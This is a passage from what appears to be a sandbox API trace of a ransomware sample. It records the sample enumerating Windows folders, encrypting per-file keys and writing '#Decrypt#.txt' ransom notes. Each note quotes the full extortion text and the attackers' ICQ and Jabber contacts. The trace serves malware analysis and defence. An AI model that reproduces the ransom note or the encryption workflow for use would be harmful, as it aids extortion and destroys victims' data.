pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.187] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0233.187] lstrcmpiW (lpString1="oskmenu", lpString2="Windows") returned -1 [0233.187] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned 76 [0233.187] lstrcmpW (lpString1="oskmenu", lpString2=".") returned 1 [0233.199] lstrcmpW (lpString1="oskmenu", lpString2="..") returned 1 [0233.199] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.200] GetProcessHeap () returned 0x780000 [0233.200] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.200] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*") returned 78 [0233.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.207] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.207] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\.") returned 78 [0233.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.207] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.207] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.207] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\..") returned 79 [0233.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.207] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0233.207] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="Windows") returned -1 [0233.208] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 92 [0233.208] StrStrIW (lpFirst="oskmenubase.xml", lpSrch=".horseleader") returned 0x0 [0233.208] lstrcmpW (lpString1="oskmenubase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.208] lstrcmpW (lpString1="oskmenubase.xml", lpString2="_uninstalling_.png") returned 1 [0233.208] lstrlenW (lpString=".testttjffg") returned 11 [0233.208] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpSrch=".testttjffg") returned 0x0 [0233.208] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.208] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.251] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 0 [0233.252] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.252] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\#Decrypt#.txt") returned 90 [0233.252] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.252] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.252] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.253] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.254] CloseHandle (hObject=0x1a4) returned 1 [0233.254] GetProcessHeap () returned 0x780000 [0233.254] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.254] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0233.254] lstrcmpiW (lpString1="oskmenu.xml", lpString2="Windows") returned -1 [0233.254] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 80 [0233.254] StrStrIW (lpFirst="oskmenu.xml", lpSrch=".horseleader") returned 0x0 [0233.254] lstrcmpW (lpString1="oskmenu.xml", lpString2="#Decrypt#.txt") returned 1 [0233.254] lstrcmpW (lpString1="oskmenu.xml", lpString2="_uninstalling_.png") returned 1 [0233.254] lstrlenW (lpString=".testttjffg") returned 11 [0233.254] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", lpSrch=".testttjffg") returned 0x0 [0233.254] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.254] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.255] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0233.255] lstrcmpiW (lpString1="osknumpad", lpString2="Windows") returned -1 [0233.255] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned 78 [0233.255] lstrcmpW (lpString1="osknumpad", lpString2=".") returned 1 [0233.255] lstrcmpW (lpString1="osknumpad", lpString2="..") returned 1 [0233.255] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.255] GetProcessHeap () returned 0x780000 [0233.255] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.255] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*") returned 80 [0233.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.255] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.255] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\.") returned 80 [0233.255] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.255] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.255] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.256] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\..") returned 81 [0233.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.256] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0233.256] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="Windows") returned -1 [0233.256] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 96 [0233.256] StrStrIW (lpFirst="osknumpadbase.xml", lpSrch=".horseleader") returned 0x0 [0233.256] lstrcmpW (lpString1="osknumpadbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.256] lstrcmpW (lpString1="osknumpadbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.256] lstrlenW (lpString=".testttjffg") returned 11 [0233.256] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.256] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.256] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.256] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 0 [0233.256] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.256] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\#Decrypt#.txt") returned 92 [0233.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.257] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.257] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.258] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.258] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.258] CloseHandle (hObject=0x1a4) returned 1 [0233.261] GetProcessHeap () returned 0x780000 [0233.261] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.261] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0233.261] lstrcmpiW (lpString1="osknumpad.xml", lpString2="Windows") returned -1 [0233.261] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 82 [0233.261] StrStrIW (lpFirst="osknumpad.xml", lpSrch=".horseleader") returned 0x0 [0233.261] lstrcmpW (lpString1="osknumpad.xml", lpString2="#Decrypt#.txt") returned 1 [0233.261] lstrcmpW (lpString1="osknumpad.xml", lpString2="_uninstalling_.png") returned 1 [0233.261] lstrlenW (lpString=".testttjffg") returned 11 [0233.261] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", lpSrch=".testttjffg") returned 0x0 [0233.261] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.261] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 